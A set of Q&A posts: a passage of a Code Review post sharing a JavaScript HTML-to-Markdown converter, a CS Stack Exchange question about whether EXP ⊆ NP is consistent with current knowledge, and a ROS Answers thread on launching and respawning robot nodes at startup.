Array.prototype.slice.call(DIV.getElementsByTagName(tag.toLowerCase())); var length = elements.length; for(var i = 0; i < length; i++) { var element = elements[i]; if(element.childNodes.length > 1) { element.innerHTML = toMarkdown(element.innerHTML); } element.parentNode.replaceChild( document.createTextNode(conversions[tag](element)), element ); } } return DIV.innerHTML; }; window.MarkdownConverter = { addParser: function(tag, fn){ if( !this.hasParser(tag) ) { conversions[(tag + '').toUpperCase()] = fn; return true; } return false; }, hasParser: function(tag){ tag = (tag + '').toUpperCase(); return (tag in conversions); }, fromHTML: function(html){ return toMarkdown(html + ''); } }; })(Function('return this')()); It exposes a very basic API. The idea is to be as close as I can from the reference. You can read about it here: https://stackoverflow.com/editing-help Some mistakes on matching the were fixed. Also, the original version was limited to 1 level only. Which means that things like <p>A <b>bold</b></p> wouldn't produce the right markdown. To fix that, I've added recursion. Also, the <blockquote> only had the markdown on the first line. All those issues and many others (that I don't remember) were fixed. Another addition was the support for the start attribute (it was deprecated on HTML4.01, but it isn't on HTML5) on ordened lists. Example of the markdown: (function(window, undefined){ 'use strict'; var TEXT_PROPERTY = document.head.innerText ? 'innerText' : 'textContent'; var NEWLINE = '\r\n'; var indent = function(text){ return text.replace(/(\r\n|\r|\n)/g,'$1 '); }; var conversions = { BR: function(){ return ' ' + NEWLINE; }, P: function(elem) { return NEWLINE + NEWLINE + elem.innerHTML + NEWLINE; }, H1: function(elem) { return '# ' + elem.innerHTML + NEWLINE; }, H2: function(elem) { return '## ' + elem.innerHTML + NEWLINE; }, H3: function(elem) { return '### ' + elem.innerHTML + NEWLINE; }, HR: function() { //we use 4 to do not cause confusion with <strike></strike> return '----' + NEWLINE; }, BLOCKQUOTE: function(elem) { return '> ' + elem .innerHTML .replace( /(\r\n|\r|\n)/g, '$1> ' ); }, IMG: function(elem) { return '![alt text](' + elem.src + ')'; }, A: function(elem) { return '[' + elem.innerHTML + '](' + elem.href + ')'; }, UL: function(elem) { var li = elem.children; var length = li.length; var md = ''; for (var i = 0; i < length; i++) { md += ' - ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, OL: function(elem) { var li = elem.children; var length = li.length; var md = ''; var start = elem.start|0; for (var i = 0; i < length; i++) { md += (i + start) + '. ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, B: function(elem) { return '**' + elem.innerHTML + '**'; }, STRONG: function(elem) { return this.B(elem); }, STRIKE: function(elem) { return '---' + elem.innerHTML + '---'; }, DEL: function(elem) { return this.STRIKE(elem); }, I: function(elem) { return '*' + elem.innerHTML + '*'; }, PRE: function(elem){ return indent(this.innerHTML) + NEWLINE; }, CODE: function(elem){ if(elem.parentNode.tagName != 'PRE') { return '``' + elem.innerHTML.replace(/\r|\n/g,'').replace(/^\s*(.*)\s*$/,'$1') + '``'; } else { this.PRE(elem); } } }; var toMarkdown = function(html){ var DIV = document.createElement('div'); //will have the HTML to parse. DIV.innerHTML = html + ''; for(var tag in conversions) { var elements = Array.prototype.slice.call(DIV.getElementsByTagName(tag.toLowerCase())); var length = elements.length; for(var i = 0; i < length; i++) { var element = elements[i]; if(element.childNodes.length > 1) { element.innerHTML = toMarkdown(element.innerHTML); } element.parentNode.replaceChild( document.createTextNode(conversions[tag](element)), element ); } } return DIV.innerHTML; }; window.MarkdownConverter = { addParser: function(tag, fn){ if( !this.hasParser(tag) ) { conversions[(tag + '').toUpperCase()] = fn; return true; } return false; }, hasParser: function(tag){ tag = (tag + '').toUpperCase(); return (tag in conversions); }, fromHTML: function(html){ return toMarkdown(html + ''); } }; })(Function('return this')()); document.body.innerHTML= '<pre>' + MarkdownConverter .fromHTML( document .getElementById('html') .innerHTML ) .replace(/</g,'&lt;') .replace(/>/g,'&gt;') + '</pre>'; <div id="html"> <p>Te<i><b>s</b></i>t</p> <h1>h1</h1> <br> <h2>h2</h2> <br> <h3>h3</h3> <br>text outside everything <br> <h2>(and another element!)</h2> <br> <img src='http://example.com/example.png'> <br><a href='http://google.com'>a link!</a> <br> <ul> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ul> <br> <ol start="2"> <li>item 1</li> <li>item 2</li> <li>item <b>3</b></li> </ol> <br><strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br> <blockquote>blockquote</blockquote> <br> </div>
{ "domain": "codereview.stackexchange", "id": 15463, "tags": "javascript, converting, markdown" }
Given the current knowledge about complexity class, what can we say?
Question: I am a CS student. I am looking at some questions my professor made and I got stuck in this one. "Which one of the following inclusions between complexity classes is coherent with the current knowledge? (even if not proved, yet)". The possible answers are: P $\subseteq$ EXP (Which I know it is true) NP $\subseteq$ EXP (Which I know it is also true) EXP $\subseteq$ P (Which is clearly false) EXP $\subseteq$ NP Now, if I flag as correct answers only the two I know that are true, I obtain that my answer is partially correct. So in conclusion my question is: Given the current knowledge can we say that EXP $\subseteq$ NP or is this just a mistake of my professor? Thank you for your answers! Answer: Notice that the question is not asking for inclusions that are known to be true, but instead just for those that could conceivably be true given the current knowledge. In other words you need to select both the relations that are already known to be true and the relations whose status is still unknown. The inclusion $\mathsf{EXP} \subseteq \mathsf{NP}$ is not disproven since, from what we know so far, it could be the case that $\mathsf{EXP} = \mathsf{NP}$. Therefore the last option should also be marked.
{ "domain": "cs.stackexchange", "id": 20225, "tags": "complexity-theory, time-complexity, np, complexity-classes" }
How to auto deploy a robot?
Question: Hey , I want to know how the robot can be configured to start on bootup . There are a handful of scripts which i want running in a proper order roscore node that accepts cmd_vel and publishes tf freenect node node that launches the description of the robot (ie URDF) node that launches the navigation related modules nodes that pertain to IMU data How do i run all of the above nodes at startup , how do i make sure that if any of them fails ,then it will be rerun ? UPDATE I have added respawn param and set it to true for the rosserial_python node , it still doesn't recover when crashing . Originally posted by chrissunny94 on ROS Answers with karma: 142 on 2018-03-06 Post score: 0 Original comments Comment by jayess on 2018-03-07: Please don't use screenshots for text. Images are not searchable, you can't copy and paste them, and you can't search them. Please update your question with a copy and paste of the error instead using the preformatted text (101010) button. Comment by Humpelstilzchen on 2018-03-07: I think the rosserial_python/respawn problem should be handled in a separate question. It also needs more information, your image doesn't really show a crashing node, just a communication problem Answer: You can do a roslaunch to run all of these nodes and start the launch file with a script for exemple. Moreover, if a node fail you can launch it again by setting the attribute respawn of the tag <node> to true like that : <node name="listener1" pkg="rospy_tutorials" type="listener.py" args="--test" respawn="true" /> That will restart your node until it runs properly. Check here to see all the attributes of the tag, some might help you ! Originally posted by Delb with karma: 3907 on 2018-03-06 This answer was ACCEPTED on the original site Post score: 2 Original comments Comment by chrissunny94 on 2018-03-07: How do i add respawn for freenect? <include file="$(find freenect_launch)/launch/freenect.launch" /> we cant add a respawn parameter when we include other launch files . Comment by Delb on 2018-03-07: Copy the content of the freenect.launch into your own launch file and add the respawn attribute to the desired nodes (don't modify the freenect.launch it's not recommended at all to modify from source)
{ "domain": "robotics.stackexchange", "id": 30218, "tags": "ros-kinetic" }
ros2 launch fails after following some tutorials
Question: ros2 launch turtlebot3_cartographer cartographer.launch.py works fine. colcon_cd PACKAGENAME to ~/dev_ws/src/PACKAGENAME works fine. colcon build --packages-select PACKAGENAME works fine in ~/dev_ws. I have that in ~/.baschrc export _colcon_cd_root=~/dev_ws export ROS_DOMAIN_ID=1 export ROS_PYTHON_VERSION=3 export ROS_VERSION=ros-foxy export LC_NUMERIC="en_US.UTF-8" source /opt/ros/foxy/setup.bash source /usr/share/colcon_cd/function/colcon_cd.sh What to check why ros2 launch PACKAGENAME.launch.py would fail ? Originally posted by vKuehn on ROS Answers with karma: 116 on 2022-04-14 Post score: 0 Answer: solved.. a package install was missing for one of mine under ~/dev_ws/src. After installing that ros2 launch works fine very odd as the missing PACKAGENAME was the one I have created. Originally posted by vKuehn with karma: 116 on 2022-04-14 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by ljaniec on 2022-04-14: How did you create this package? Maybe you missed a step in its configuration Comment by vKuehn on 2022-04-15: @ljaniec that is very probably the case. But how to fix such a problem I would have hoped for some hint during the start or a log to look at... Comment by ljaniec on 2022-04-15: I think rosdep should help you here with additional dependencies in your workspace Comment by vKuehn on 2022-04-15: that's the ros1 documentation. but thanks for the hint Comment by ljaniec on 2022-04-15: Rosdep is used with ROS2 too: https://docs.ros.org/en/galactic/Installation/Ubuntu-Development-Setup.html#install-dependencies-using-rosdep, https://docs.ros.org/en/galactic/How-To-Guides/Building-a-Custom-Debian-Package.html?highlight=rosdep, https://answers.ros.org/question/310728/rosdep-and-ros2/ Comment by vKuehn on 2022-04-18: thanks for that and keeping answering
{ "domain": "robotics.stackexchange", "id": 37577, "tags": "ros2, roslaunch" }